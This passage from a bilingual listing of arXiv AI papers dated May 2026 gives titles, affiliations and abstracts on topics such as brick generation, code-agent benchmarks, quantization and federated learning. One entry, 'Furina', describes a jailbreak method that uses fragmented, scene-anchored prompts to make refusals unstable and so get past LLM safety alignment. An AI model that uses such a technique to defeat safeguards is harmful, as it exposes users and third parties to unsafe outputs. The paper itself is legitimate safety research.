Hybrid post-training usually combines supervised fine-tuning and reinforcement learning, but fixed mixing schedules cannot adapt when the relative noise of the two signals changes over time. We propose GAC, a noise-aware controller that derives an adaptive mixing weight from online estimates of gradient variance and disagreement between the two training signals. The method adds smoothing, prior guidance, and bounded updates while reusing existing training tensors. Experiments on math, code, science, and logic benchmarks show that GAC consistently improves hybrid post-training over strong fixed and rule-based baselines, with larger gains at larger model scales and less than 1% training overhead.

2605.26182 2026-05-27 cs.AI cs.GR 版本更新

BrickAnything: Geometry-Conditioned Buildable Brick Generation with Structure-Aware Tokenization

BrickAnything: 基于几何条件的可构建砖块生成与结构感知标记化

Zhengyang Ni, Feng Yan, Yu Guo, Fei Wang

发表机构 * Xi’an Jiaotong University(西安交通大学) State Key Laboratory of Human-Machine Hybrid Augmented Intelligence(人机混合增强智能国家重点实验室) Institute of Artificial Intelligence and Robotics(人工智能与机器人研究院)

AI总结 提出BrickAnything,一个基于几何条件的自回归框架,通过结构感知树标记化生成满足装配约束和结构稳定性的砖块结构。

详情
AI中文摘要

从3D形状生成物理可构建的砖块结构不仅需要几何重建,输出还必须满足离散零件约束和结构稳定性。现有的砖块生成方法要么依赖启发式优化,当目标3D形状在预定义约束下无法实现可行结构时可能失败;要么生成砖块序列而不显式建模底层3D几何和装配关系。在这项工作中,我们提出了BrickAnything,一个基于几何条件的自回归框架,用于从多样的3D表示生成可构建的砖块结构。BrickAnything使用点云作为统一的几何接口,并预测在装配约束下重建目标形状的砖块序列。为了建模砖块之间的结构依赖性,我们引入了结构感知树标记化,通过局部附着关系表示砖块结构。这种公式使序列生成更符合物理构建过程,并减少无效中间状态。我们进一步引入了基于偏好的对齐后训练、有效性约束解码和自适应回滚,以改善可构建性目标,如稳定性和几何保真度。大量实验表明,BrickAnything生成几何忠实且物理可实现的砖块结构,并且与传统的排序策略相比,所提出的标记化有效减少了回滚和重新生成。

英文摘要

Generating physically buildable brick structures from 3D shapes requires more than geometric reconstruction: the output must also satisfy discrete part constraints and structural stability. Existing brick generation methods either rely on heuristic optimization, which can break down when the target 3D shape does not admit a feasible structure under predefined constraints, or generate brick sequences without explicitly modeling the underlying 3D geometry and assembly relations. In this work, we present BrickAnything, a geometry-conditioned autoregressive framework for generating buildable brick structures from diverse 3D representations. BrickAnything uses point clouds as a unified geometric interface and predicts brick sequences that reconstruct the target shape under assembly constraints. To model structural dependencies among bricks, we introduce a structure-aware tree tokenization, which represents brick structures through local attachment relations. This formulation makes sequence generation more consistent with the physical construction process, and reduces invalid intermediate states. We further introduce preference-based alignment post-training, validity-constrained decoding and adaptive rollback to improve buildability objectives such as stability and geometric fidelity. Extensive experiments demonstrate that BrickAnything produces geometrically faithful and physically realizable brick structures, and that the proposed tokenization effectively reduces rollback and regeneration compared with conventional ordering strategies.

2605.26177 2026-05-27 cs.SE cs.AI 版本更新

RepoMirage: Probing Repository Context Reasoning in Code Agents with Perturbations

RepoMirage: 通过扰动探测代码智能体的仓库上下文推理

Hanyu Li, Yichi Zhang, Speed Zhu, Hang Su, Jun Zhu, Yinpeng Dong

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学) Tsinghua University(清华大学) Tencent(腾讯)

AI总结 提出RepoMirage评估套件,通过语义保持的仓库级扰动和扩展任务,揭示代码智能体在仓库上下文推理中的显著缺陷,并基于结构优先的原型工作流RepoAnchor展示改进。

详情
AI中文摘要

代码智能体目前在仓库级软件工程基准上表现出色,但尚不清楚端到端任务(如问题解决)的成功是否真正反映了仓库上下文推理——即跨多个文件识别任务相关信息并推理其间关系的能力。为探究此问题,我们引入RepoMirage,这是一个基于SWE-Bench Verified构建的两阶段评估套件,采用扰动作为诊断工具,通过改变仓库的暴露方式来增加对上下文推理的需求。首先,RepoMirage-Perturb应用三种语义保持的仓库级扰动,揭示当正确求解需要更广泛的上下文访问时,性能明显下降。RepoMirage-Extend进一步将扰动针对的结构瓶颈转化为问题解决之外的显式任务,平均性能从原始设置的66.8%下降到25.3%,表明仓库上下文推理存在显著缺陷。进一步的轨迹分析揭示了探索漂移,即智能体访问更广泛的仓库上下文但未能将其转化为有效的结构信息。受此观察启发,我们提出RepoAnchor,一种结构优先的原型工作流,将仓库探索与下游问题解决分离,并表明显式的结构支撑带来了显著收益。这些结果揭示了代码智能体在仓库上下文推理中一个先前被忽视的差距,并表明更强的结构感知方法有潜力改进它们。

英文摘要

Code agents are currently having skillful performance on repository-level software engineering benchmarks, but it remains unclear whether success on end-to-end tasks such as issue resolution truly reflects repository context reasoning, the ability to identify the task-relevant information across multiple files and reason over the relations among them. To investigate this question, we introduce RepoMirage, a two-stage evaluation suite built on SWE-Bench Verified that adopts perturbation as a diagnostic tool to increase the demand for context reasoning by transforming how the repository is exposed. First, RepoMirage-Perturb applies three types of semantics-preserving repository-level perturbations, revealing a clear performance drop when correct solving requires broader context access. RepoMirage-Extend further turns perturbation-targeted structural bottlenecks into explicit tasks beyond issue resolution, where the average performance declines from 66.8% in the original setting to 25.3%, indicating a significant deficiency in repository context reasoning. Further trajectory analysis reveals an exploration drift, where agents access broader repository context but fail to turn it into effective structure information. Motivated by this observation, we propose RepoAnchor, a structure-first prototype workflow that separates repository exploration from downstream problem solving, and show that explicit structural scaffolding yields notable gains. These results uncover an previously overlooked gap in repository context reasoning for code agents and suggest that stronger structure-aware methods are potential to improve them.

2605.26176 2026-05-27 cs.SD cs.AI 版本更新

PitchBench: Measuring Pitch Hearing in Audio-Language Models

PitchBench: 测量音频-语言模型中的音高听觉能力

Milan Liessens Dujardin, Song-Ze Yu, Craver Corbyn Thomas-Smith, David M. Chan, Karina Nguyen

发表机构 * University of California, Berkeley(加州大学伯克利分校) Thoughtful Lab

AI总结 提出PitchBench评估套件,通过28个实验系统测量音频-语言模型在绝对和相对音高感知上的表现,发现当前模型在不同声源、音长和格式下音高感知不可靠。

Comments Preprint

详情
AI中文摘要

音频-语言模型(ALMs)越来越多地用于需要理解音乐的实际应用,从音乐辅导和转录到字幕、推荐系统和音乐制作。更广泛地说,它们正在成为多模态AI系统的重要组成部分,这些系统必须从感官输入而非仅文本进行推理。这使得可靠的音乐感知成为关键前提:如果模型无法准确听到声音的结构,就不能信任它来推理、教学、转录或对现实世界中的音频采取行动。然而,现有的基准测试很少评估这种感知背后最基本的音乐能力之一:音高听觉。当前的评估往往通过更高层次的任务间接探测音高听觉,且通常采用多项选择格式,这留下了ALMs在不同乐器、声学条件和响应格式下识别细粒度音高的可靠性问题。我们引入了PitchBench,一个系统测量ALMs音高听觉的评估套件。PitchBench包含28个实验,涵盖序列和和弦中的绝对和相对音高感知,同时变化响度、音符时长、声源、时间拉伸、背景噪声和其他声学条件。任务范围从识别孤立音高到在四声部音乐织体中跟踪旋律线。评估前沿ALMs,我们发现音高听觉仍然非常不可靠:模型在不同设置下表现持续不佳,准确率随声源、音符时长和记谱格式急剧变化。当前的ALMs尚未具备稳定的音高感知,即使对于受控的合成和乐器刺激也是如此。除了基准测试,我们还发布了PitchBench作为Python包,包含评估数据和数据生成工具,以支持未来关于音高感知音频-语言建模的工作。

英文摘要

Audio-language models (ALMs) are increasingly used in real-world applications that require understanding music, from music tutoring and transcription to captioning, recommendation systems, and music production. More broadly, they are becoming an important component of multimodal AI systems that must reason from sensory input rather than text alone. This makes reliable musical perception a critical prerequisite: if a model cannot accurately hear the structure of sound, it cannot be trusted to reason about, teach, transcribe, or act on audio in the real world. Yet existing benchmarks rarely assess one of the most fundamental musical abilities underlying such perception: pitch hearing. Current evaluations tend to probe pitch hearing only indirectly, through higher-level tasks and often in multiple-choice formats, leaving open how reliably ALMs identify fine-grained pitch across instruments, acoustic conditions, and response formats. We introduce PitchBench, an evaluation suite that systematically measures pitch hearing in ALMs. PitchBench comprises 28 experiments spanning absolute and relative pitch perception within sequences and chords, while varying loudness, note duration, sound source, time stretching, background noise, and other acoustic conditions. Tasks range from identifying individual pitches in isolation to tracking a melodic line within a four-part musical texture. Evaluating frontier ALMs, we find that pitch hearing remains highly unreliable: models perform consistently poorly across settings, with accuracy varying sharply by sound source, note duration, and notation format. Current ALMs do not yet possess stable pitch perception, even for controlled synthetic and instrumental stimuli. Alongside the benchmark, we release PitchBench as a Python package containing the evaluation data and data generation tools to support future work on pitch-aware audio-language modeling.

2605.26175 2026-05-27 cs.LG cs.AI 版本更新

InfoQuant: Shaping Activation Distributions for Low-Bit LLM Quantization

InfoQuant:为低比特LLM量化塑造激活分布

Ke Li, Dong An, Xiaoling Zang, Can Ye, Liang Xie, Qibo Qiu, Chen Shen, Xiaofei He, Wenxiao Wang

发表机构 * School of Software Technology, Zhejiang University(浙江大学软件学院) Ant Group(蚂蚁集团) College of Computer Science and Technology, Zhejiang University of Technology(浙江工业大学计算机科学与技术学院) China Mobile (Zhejiang) Research & Innovation Institute(中国移动(浙江)研究院) Alibaba Cloud Computing(阿里云计算) State Key Lab of CAD&CG, Zhejiang University(浙江大学CAD&CG国家重点实验室)

AI总结 针对低比特激活量化中分布与量化器不匹配的问题,提出基于信息论的分析和无需训练的峰值抑制正交变换(PSOT)方法,显著提升量化精度。

详情
AI中文摘要

低比特激活量化仍然是高效大语言模型(LLM)部署的主要瓶颈。难点不仅在于激活值包含异常值,还在于其分布通常与低比特均匀量化器不匹配。现有的训练后量化(PTQ)方法抑制峰值、平衡通道或最小化重建误差,但很少明确说明什么样的激活分布实际上易于离散化。因此,激活值可能在数值上更平滑,但仍会产生较大的量化误差,因为量化范围仍然很宽,或者大多数值坍缩到均值附近的几个水平。我们将激活变换重新表述为面向量化器的分布设计,并从信息论角度分析量化误差。我们的分析表明,有利于量化的激活值应同时具有较小的数值范围和在该范围内的足够分散性。在此分析指导下,我们提出InfoQuant,一种无需训练的方法,采用峰值抑制正交变换(PSOT)将激活值塑造成更有利于量化的分布。我们进一步引入自适应异常值标记选择,以提高PSOT在优化过程中的鲁棒性。在多个LLM家族中,InfoQuant始终优于先前的PTQ和端到端训练基线。在W4A4KV4下,它平均保留了97%的浮点精度,并将LLaMA-2 13B的性能差距较先前最先进方法缩小了42%。代码可在[https://github.com/LLIKKE/InfoQuant](https://github.com/LLIKKE/InfoQuant)获取。

英文摘要

Low-bit activation quantization remains a major bottleneck in efficient large language model (LLM) deployment. The difficulty is not only that activations contain outliers, but that their distributions are often poorly matched to a low-bit uniform quantizer. Existing post-training quantization (PTQ) methods suppress peaks, balance channels, or minimize reconstruction error, yet they rarely specify what activation distribution is actually easy to discretize. As a result, activations may appear numerically smoother while still incurring large quantization error because the quantization range remains wide or most values collapse into a few levels near the mean. We recast activation transformation as quantizer-facing distribution design and analyze quantization error from an information-theoretic perspective. Our analysis shows that quantization-friendly activations should jointly have a smaller numerical range and sufficient dispersion within that range. Guided by this analysis, we propose InfoQuant, a train-free method that employs Peak Suppression Orthogonal Transformation (PSOT) to shape activations into more quantization-friendly distributions. We further introduce adaptive outlier-token selection to improve the robustness of PSOT during optimization. Across multiple LLM families, InfoQuant consistently outperforms prior PTQ and end-to-end training baselines. Under W4A4KV4, it preserves 97% of floating-point accuracy on average and reduces the LLaMA-2 13B performance gap by 42% over the previous state of the art. Code is available at [https://github.com/LLIKKE/InfoQuant](https://github.com/LLIKKE/InfoQuant)

2605.26174 2026-05-27 cs.SE cs.AI cs.CL cs.MA 版本更新

A Universal Cliff and a Design Fingerprint: Cross-Section Defect Detection Under LLM Orchestration

一个通用悬崖与一个设计指纹:LLM编排下的跨段缺陷检测

Hiroki Fukui

发表机构 * Research Institute of Criminal Psychiatry(刑事精神病研究机构) Sex Offender Medical Center(性犯罪医疗中心) Department of Neuropsychiatry, Graduate School of Medicine, Kyoto University(京都大学医学研究生院神经精神病学部门)

AI总结 本研究揭示在LLM编排下,所有模型检测跨段矛盾缺陷的能力大幅下降(检测率降低三分之二以上),并发现不同对齐范式下的模型行为差异,其中一家开发商的模型随对齐增强呈现报告标准偏移。

Comments 24 pages, 2 figures. Data and code: doi:10.5281/zenodo.20372696

详情
AI中文摘要

生产级语言模型系统通过将请求分解为不可见的编排工作代理(这些代理重新组合成一份综合报告)来回答请求。我们探究这对一类单个代理无法察觉的缺陷——文档中两个远距离段落之间关系的矛盾——有何影响。保持文档、缺陷、机制、评分和种子不变,我们仅改变模型:来自同一开发商的五代的十个系统,以及来自不同对齐范式的五个提供商。 两个层次分离。首先,一个通用检测悬崖:每个在单代理下能发现这些跨段缺陷的模型,在编排下失去该能力,检测率在所有测试的范式中下降三分之二或更多。该悬崖源于机制,无法通过规模或扩展推理弥补。其次,模型跌落后的行为方式。信号检测分解显示,在六个高于随机水平的判别模型中,只有一家开发商的模型沿报告标准轴移动:随着对齐增强,模型漏检更少缺陷,但在干净文档上引发更多误报——这是同一标准偏移的两个方面,在该开发商内部随代际缩放(p < 0.001),而在其他地方几乎不存在。 在底层,漏检的缺陷往往并非不可见:模型的私有记录准确重构了结构故障,而综合报告却确认其完好,其关注点放在工件和缺失的合作者上。这难以量化——自动评判不稳定(精确率17-50%),关键词也无法将其与普通同意区分——我们将这种抵抗作为一项发现报告。我们发布所有运行、探针、缺陷密钥、评分提示和脚本。综合报告的置信度对跨分区缺陷无信息量,最对齐的系统并非最安全,而悬崖是结构性的。

英文摘要

Production language-model systems answer a request by partitioning it across an invisible orchestration of worker agents that recompose one integrated report. We ask what this does to a class of defect no single worker can see: a contradiction in the relation between two distant sections of a document. Holding the documents, defects, mechanism, scoring, and seed fixed, we vary only the model -- ten systems across five generations from one developer and five providers from distinct alignment paradigms. Two layers separate. First, a universal detection cliff: every model that finds these cross-section defects under a single agent loses that ability under orchestration, detection falling two-thirds or more across every paradigm tested. The cliff is mechanism-derived and not closed by scale or extended reasoning. Second, how models behave once fallen. A signal-detection decomposition shows that, among the six models discriminating above chance, only one developer's generations move along the reporting-criterion axis: as alignment is strengthened, the model misses fewer defects yet raises more false alarms on clean documents -- two faces of one criterion shift, scaling with generation within that developer (p < 0.001) and near-absent elsewhere. At the floor the missed defect is often not out of view: the model's private record reconstructs the structural fault accurately, while the integrated report signs off on its soundness, its concern spent on the artifact and an absent collaborator. This resists quantification -- an automated judge is unstable (precision 17-50%) and keywords cannot separate it from ordinary agreement -- a resistance we report as a finding. We release all runs, probes, defect keys, scorer prompts, and scripts. An integrated report's confidence is uninformative about partition-spanning defects, the most aligned systems are not the safest, and the cliff is structural.

2605.26167 2026-05-27 cs.LG cs.AI math.DS math.RA 版本更新

Planning Neural Dynamics with Lie Group Embedding through Supervised Projective Manifold Learning

通过监督投影流形学习进行李群嵌入的神经动力学规划

Tianwei Wang, Bryan Chen, Qian Zuo, Qiyue Xia, Xin Li, Wei Pang

发表机构 * School of Informatics(信息学院) School of Mathematics(数学学院) University of Edinburgh(爱丁堡大学) School of Computer Science(计算机科学学院) School of MACS(MACS学院) Beijing Institute of Technology(北京理工大学) Heriot-Watt University(赫瑞-瓦特大学)

AI总结 提出李群嵌入动力神经网络(LieEDNN),通过梯度下降和流形上的度量投影实现可学习且稳定的动力学,解决李群与神经网络加法不兼容及非线性表示空间中的演化问题,并在SE(3)伸缩机械臂上验证。

Comments Preprint. Under review

详情
AI中文摘要

我们提出了李群嵌入动力神经网络(LieEDNN)以及基于梯度下降和光滑流形上度量投影的相应学习算法,其中我们将李群视为流形几何连续对称性的内在表示。因此,我们在底层流形上实现了可学习且稳定的动力学,适用于一般李群,并且能够利用李群(如SO(3)和SE(3))强大的表示能力来解决机器人、图形和控制等领域的实际工程问题。两个核心挑战是:(i)一般李群与加法运算不兼容,而加法是神经网络交互所必需的。(ii)动力学在特殊代数的非线性表示空间中演化,而非正常的欧几里得空间,这违反了常见神经常微分方程的范式。为了解决这两个挑战,我们首先引入李代数上的伴随李群作用,它诱导出一个线性映射并转移到权重矩阵的分块结构,使得加法可以在李代数上作为向量空间进行运算。然后我们将李代数和伴随作用参数化为线性变换,从而使架构与神经网络感知器对齐。明确地说,这种嵌入表现为权重上的分块流形约束,我们开发了学习算法,以确保时间神经网络动力学的平衡态具有稳定性保证。我们在特定李群SE(3)上进行了实验,应用场景为伸缩机械臂。

英文摘要

We propose Lie group embedded dynamical neural networks (LieEDNN) and the corresponding learning algorithms based on gradient descent and metric projection on smooth manifold, where we treat Lie group as an intrinsic representation for continuous symmetry of manifold geometry. Thereby we achieve learnable and stable dynamics on the underlying manifold for general Lie group, and we are able to utilize the powerful representation capability of Lie group such as SO(3) and SE(3) to solve real world engineering problems in areas such as robotics, graphics, and control. Two core challenges are: (i) General Lie groups are incompatible with addition arithmetic, which is necessary for neural network interactions. (ii) The dynamics evolve in the nonlinear representation space of special algebra rather than the normal Euclidean space, which violates the paradigm of common neural ODEs. To address these two challenges, we firstly introduce adjoint Lie group action on the Lie algebra, which induces a linear mapping and transfer to the block-wise structure of weight matrices, such that addition could operate on the Lie algebra as a vector space. Then we parameterize the Lie algebra and the adjoint action as linear transformation so that the architecture is aligned with neural network perceptrons. Explicitly, this embedding appears as block-wise manifold constraints on weights, and we develop algorithms to learn the equilibrium with stability guarantees of the temporal neural network dynamics. Experiments are implemented on a specific Lie group SE(3), with the application scenario of telescopic manipulators.

2605.26166 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Enhancing Autonomous Online Intrusion Detection for IoT with Balanced Learning, Reliable Pseudo-Labels, and Lightweight Architectures

增强物联网自主在线入侵检测:平衡学习、可靠伪标签与轻量级架构

Hanzala Afzaal, Danish Memon, Chouhdary Bilal Raza, Muhammad Khurram Shahzad

发表机构 * School of Electrical Engineering and Computer Science (SEECS)(电气工程与计算机科学学院) National University of Sciences and Technology (NUST)(国立科学与技术大学)

AI总结 针对AOC-IDS在类不平衡、伪标签不可靠、泛化性差和计算开销大等四方面缺陷,提出XGBoost-BalSamp、PseudoFilter、MixupAug和LiteAE等改进方法,在UNSW-NB15上准确率提升至95.45%,参数减少55%。

Comments 9 pages, 5 figures; Code available at https://github.com/danishmemon847/AOC-IDS-Pipeline

详情
AI中文摘要

物联网设备的快速普及迫切需求能够处理动态和不断演变的网络威胁的自适应、资源高效的入侵检测系统。本文研究了AOC-IDS,一种发表于IEEE INFOCOM 2024的最先进的自主在线IDS,它采用具有簇排斥对比损失的自动编码器和自主高斯决策模块。我们首先在UNSW-NB15基准上成功复现了AOC-IDS,达到了89.39%的准确率,与发表的89.19%高度一致。然后我们识别了四个关键局限性:类不平衡、不可靠的伪标签生成、有限的泛化能力以及物联网部署的计算开销,并针对每个问题提出了改进方法。我们的XGBoost-BalSamp方法在UNSW-NB15上达到了95.45%的准确率,比基线提高了6.26%。我们的组合深度学习方法(PseudoFilter、MixupAug和LiteAE)实现了最佳运行准确率90.88%(F1:91.45%),超过了原论文,同时将模型参数减少了55%。这些结果表明,对AOC-IDS的针对性改进在提高实际物联网边缘设备可部署性的同时,实现了持续的准确率提升。

英文摘要

The rapid proliferation of Internet of Things (IoT) devices has created an urgent demand for adaptive, resource-efficient Intrusion Detection Systems (IDS) capable of handling dynamic and evolving cyber threats. This paper investigates AOC-IDS, a state-of-the-art autonomous online IDS published at IEEE INFOCOM 2024, which employs an Autoencoder (AE) with Cluster Repelling Contrastive (CRC) loss and an autonomous Gaussian-based decision module. We first successfully replicate AOC-IDS on the UNSW-NB15 benchmark, achieving 89.39% accuracy in close agreement with the published 89.19%. We then identify four key limitations: class imbalance, unreliable pseudo-label generation, limited generalization, and computational overhead for IoT deployment, and propose targeted improvements for each. Our XGBoost-BalSamp method achieves 95.45% accuracy on UNSW-NB15, a gain of 6.26% over the baseline. Our combined deep learning approach (PseudoFilter, MixupAug, and LiteAE) achieves a best-run accuracy of 90.88% (F1: 91.45%), surpassing the base paper while reducing model parameters by 55%.These results demonstrate that targeted improvements to AOC-IDS yield consistent accuracy gains while improving practical deployability on IoT edge devices.

2605.26165 2026-05-27 cs.SE cs.AI cs.CL 版本更新

Tool-Schema Compression Enables Agentic RAG Under Constrained Context Budgets

工具模式压缩实现受限上下文预算下的智能体检索增强生成

Furkan Sakizli

发表机构 * Independent Researcher(独立研究者)

AI总结 针对智能体RAG系统中工具模式与检索上下文竞争资源的问题,提出工具模式压缩方法,在8K上下文预算下将平均精确匹配率提升20.5个百分点,并验证了压缩模式在超过800个工具时仍可运行。

Comments 12 pages (8 main + 4 appendix), 7 tables, 2 figures. Code and data: https://github.com/SKZL-AI/tscg

详情
AI中文摘要

配备数十到数百个工具定义的语言模型的智能体RAG系统面临关键资源冲突:工具模式消耗了检索增强生成所需的相同上下文窗口。我们首次系统研究了这种工具-上下文权衡,评估了14个模型(涵盖1.5B-32B本地模型和一个前沿API模型),在三个上下文预算(8K、16K、32K)下使用28个工具定义进行了6,566次受控API调用。应用TSCG保守配置文件压缩(节省44-50%的模式令牌),我们观察到二元启用效应:在8K令牌时,JSON模式工具定义完全溢出上下文窗口,导致接近零的EM(平均2.6%),而压缩模式恢复了RAG功能,所有八个模型平均精确匹配提升20.5个百分点(六个表现出完全启用的模型平均提升24.7个百分点)。在32K(两种格式都适合)时,五个测试模型中的四个显示delta <= 1个百分点,确认该效应纯粹由预算驱动。在HotpotQA(50个多跳问题)上的外部验证显示,在相同溢出场景下EM提升48个百分点。前沿扩展测试表明,JSON模式在大约494个工具时溢出,而压缩模式在超过800个工具时仍可运行。我们的结果确立了工具模式压缩作为受限上下文部署中智能体RAG的必要基础设施层。所有代码、数据和检查点均已公开。

英文摘要

Agentic RAG systems that equip language models with dozens to hundreds of tool definitions face a critical resource conflict: tool schemas consume the same context window needed for retrieval-augmented generation. We present the first systematic study of this tool-context trade-off, evaluating 14 models spanning 1.5B-32B local models plus one frontier API model across 6,566 controlled API calls at three context budgets (8K, 16K, 32K) with 28 tool definitions. Applying TSCG conservative-profile compression (44-50% schema token savings), we observe a binary enablement effect: at 8K tokens, JSON-schema tool definitions overflow the context window entirely, yielding near-zero EM (2.6% average), while compressed schemas restore RAG functionality with +20.5 pp average exact-match lift across all eight models (+24.7 pp among the six exhibiting full enablement). At 32K -- where both formats fit -- four of five tested models show delta <= 1 pp, confirming the effect is purely budget-driven. External validation on HotpotQA (50 multi-hop questions) shows +48 pp EM under the same overflow scenario. Frontier scaling tests demonstrate that JSON schemas overflow at ~494 tools while compressed schemas remain operational beyond 800 tools. Our results establish tool-schema compression as a necessary infrastructure layer for agentic RAG in constrained-context deployments. All code, data, and checkpoints are publicly available.

2605.26162 2026-05-27 cs.LG cs.AI 版本更新

On the Push-Based Asynchronous Federated Learning: A Bias-Correction Aggregation Approach

基于推送的异步联邦学习:一种偏差校正聚合方法

Jiahui Bai, Hai Dong, A. K. Qin

发表机构 * School of Computer Technologies, RMIT University(RMIT大学计算机技术学院) School of Science, Computing and Engineering Technologies, Swinburne University of Technology(斯威丁大学科学与工程技术学院)

AI总结 提出PushCen-ADFL框架,通过中心表示空间中的平均保持推-求和混合与轻量级中心正则化,解决异步去中心化联邦学习中的通信开销、聚合偏差和模型漂移问题。

Comments Accepted at the 32nd ACM SIGKDD Conference on Knowledge Discovery and Data Mining (KDD 2026). This is the extended version with full appendix

详情
AI中文摘要

异步去中心化联邦学习(ADFL)消除了中央协调和全局同步,使其在大规模和异构系统中具有吸引力。然而,频繁的点对点通信、有向拓扑上的异步更新以及非独立同分布数据共同导致了过高的通信开销、有偏聚合和严重的模型漂移。我们提出了PushCen-ADFL,一种通信高效的ADFL框架,能够在非对称通信和延迟客户端参与下实现稳定训练。PushCen-ADFL在共享中心表示空间中耦合了通信、聚合和局部稳定化,形成了压缩与优化之间的闭环。客户端交换中心形式的消息,应用平均保持的推-求和混合来校正聚合偏差,并使用锚定在同一中心空间的轻量级中心正则化来减轻异构性和陈旧性下的漂移。一个有界、发送者去重的缓冲区进一步提高了在异步到达不规则情况下的鲁棒性。在视觉数据集上的实验表明,PushCen-ADFL在数据异构性下将准确率提高了最多6%,同时将每次推送的通信成本降低了80%以上,实现了良好的准确率-通信权衡。

英文摘要

Asynchronous decentralized federated learning (ADFL) eliminates central coordination and global synchronization, making it attractive for large-scale and heterogeneous systems. However, frequent peer-to-peer communication, asynchronous updates on directed topologies, and non-IID data jointly lead to excessive communication overhead, biased aggregation and severe model drift. We propose PushCen-ADFL, a communication-efficient ADFL framework that enables stable training under asymmetric communication and delayed client participation. PushCen-ADFL couples communication, aggregation, and local stabilization in a shared centroid representation space, forming a closed loop between compression and optimization. Clients exchange centroid-form messages, apply average-preserving push-sum mixing to correct aggregation bias, and use a lightweight centroid regularization anchored in the same centroid space to mitigate drift under heterogeneity and staleness. A bounded, sender-deduplicated buffer further improves robustness under irregular asynchronous arrivals. Experiments on vision datasets demonstrate that PushCen-ADFL improves accuracy under data heterogeneity by up to 6\% while reducing per-push communication cost by more than 80\%, achieving a favorable accuracy-communication trade-off.

2605.26161 2026-05-27 cs.LG cs.AI 版本更新

TSFMAudit: Data Contamination Auditing in Forecasting Time Series Foundation Models

TSFMAudit: 时间序列基础模型中的数据污染审计

Hongkai Li, Shifeng Xie, Lefei Shen, Zhuo Li, Mouxiang Chen, Xiaobin Zhang, Han Fu, Jianling Sun, Xiaoxue Ren, Chenghao Liu

发表机构 * Zhejiang University(浙江大学) Télécom Paris(巴黎高等电信学院) State Street Technology (Zhejiang) Ltd.(State Street Technology(浙江)有限公司) Datadog

AI总结 针对时间序列基础模型(TSFMs)预训练数据污染问题,提出基于探针适应动力学的审计方法TSFMAudit,通过检测微调后损失下降更快且骨干网络移动更小的异常现象来识别污染数据集。

Comments 22 pages, 7 figures, 9 tables

详情
AI中文摘要

时间序列基础模型(TSFMs)越来越多地在大型语料库上进行预训练,这引发了评估数据集可能在预训练期间被暴露从而导致过于乐观的性能估计的担忧。在时间序列中审计此类污染具有挑战性,因为信号是连续且异质的,并且通常缺乏语料库文档。据我们所知,这是第一个研究TSFMs预训练污染审计的工作。我们形式化了TSFMs的预训练污染审计问题,并提出了TSFMAudit,一种基于探针适应动力学的方法。我们的关键直觉是,污染表现为异常高效的适应:在微调探针后,受污染的数据集往往表现出更快的损失减少和更小的骨干网络移动。我们在6个TSFMs和187个数据集上评估了TSFMAudit,使用文档化的训练来源证据作为监督,并与从LLM文献中改编的10个竞争基线进行了比较。

英文摘要

Time series foundation models (TSFMs) are increasingly pretrained on large corpora, raising concerns that evaluation datasets may have been exposed during pretraining and thus yield overly optimistic performance estimates. Auditing such contamination is challenging in time series because signals are continuous and heterogeneous, and often lack corpus documentation. To the best of our knowledge, this is the first work to study pretraining contamination auditing for TSFMs. We formalize the problem of pretraining contamination auditing for TSFMs and propose TSFMAudit, a method based on probe adaptation dynamics. Our key intuition is that contamination manifests as unusually efficient adaptation: after a fine tuning probe, contaminated datasets tend to exhibit faster loss reduction with smaller backbone movement. We evaluate TSFMAudit on 6 TSFMs and 187 datasets using documented training source evidence as supervision, and compare against 10 competitive baselines adapted from the LLM literature.

2605.26158 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Furina: Fragmented Uncertainty-Driven Refusal Instability Attack

Furina: 碎片化不确定性驱动的拒绝不稳定攻击

Tongxi Wu, Jian Zhang, Yang Gao

发表机构 * School of Intelligence Science and Technology(智能科学与技术学院) State Key Laboratory for Novel Software Technology(新型软件技术国家重点实验室) Nanjing University(南京大学)

AI总结 通过揭示大语言模型安全行为存在不稳定区域,提出多指标诊断框架并开发Furina攻击方法,利用碎片化场景提示诱导不确定性放大,实现高效越狱。

Comments This work is accepted as a regular paper at ICML 2026

详情
AI中文摘要

大语言模型和多模态大语言模型的安全对齐通常被认为是一种近二值阈值机制。我们通过揭示安全行为受不稳定区域支配来挑战这一假设,在该区域中,小的扰动会引发随机的拒绝决策而非确定性结果。我们开发了一个结合外部和内部信号的多指标诊断框架来表征这种不稳定性。通过系统实验,我们识别出一个特征性的诊断标志:处于不稳定区域的输入表现出更高的输出不确定性,同时内部安全激活降低,这种解耦现象解释了为什么基于检测的防御无法抵御复杂攻击。基于此框架,我们提出了Furina,一种越狱攻击,它通过碎片化、场景锚定的提示故意诱导这种特征,无需针对模型的优化。Furina在HarmBench上优于强单轮和多轮基线,并在MM-SafetyBench上取得了有竞争力的结果,表明不确定性放大为理解安全漏洞提供了一种有原则且可迁移的机制。代码见:https://github.com/0xCavaliers/Furina_Jailbreak。

英文摘要

Safety alignment in large language models (LLMs) and multimodal large language models (MLLMs) is commonly assumed to operate as a near-binary threshold mechanism. We challenge this assumption by revealing that safety behavior is governed by an instability region where small perturbations induce stochastic refusal decisions rather than deterministic outcomes. We develop a multi-metric diagnostic framework combining external and internal signals to characterize this instability. Through systematic experiments, we identify a characteristic diagnostic signature: inputs in unstable regimes exhibit elevated output uncertainty yet decreased internal safety activation, a decoupling phenomenon that explains why detection-based defenses fail against sophisticated attacks. Building on this framework, we introduce Furina, a jailbreak attack that deliberately induces this signature through fragmented, scene-anchored prompts without model-specific optimization. Furina outperforms strong single-turn and multi-turn baselines on HarmBench and achieves competitive results on MM-SafetyBench, demonstrating that uncertainty amplification provides a principled and transferable mechanism for understanding safety vulnerabilities. Code is available at: https://github.com/0xCavaliers/Furina_Jailbreak.

2605.26155 2026-05-27 cs.RO cs.AI cs.LG 版本更新

When Does Adaptive Guidance Help? Belief-Aware Privileged Distillation for Autonomous Driving Under Partial Observability

自适应引导何时有帮助?部分可观测条件下自动驾驶的信念感知特权蒸馏

Mehmet Haklidir

发表机构 * TUBITAK BILGEM Artificial Intelligence Institute(土耳其TUBITAK BILGEM人工智能研究所)

AI总结 本文提出信念感知GSAC(BA-GSAC),通过集成分歧动态调节蒸馏系数,系统研究自适应引导在部分可观测自动驾驶中的有效性,发现严重遮挡下系数过早崩溃,并揭示可观测性盲区问题。

Comments 9 pages, 3 figures, 7 tables. Accepted at CVPR 2026 Workshop on Autonomous Driving (WAD)

详情
AI中文摘要

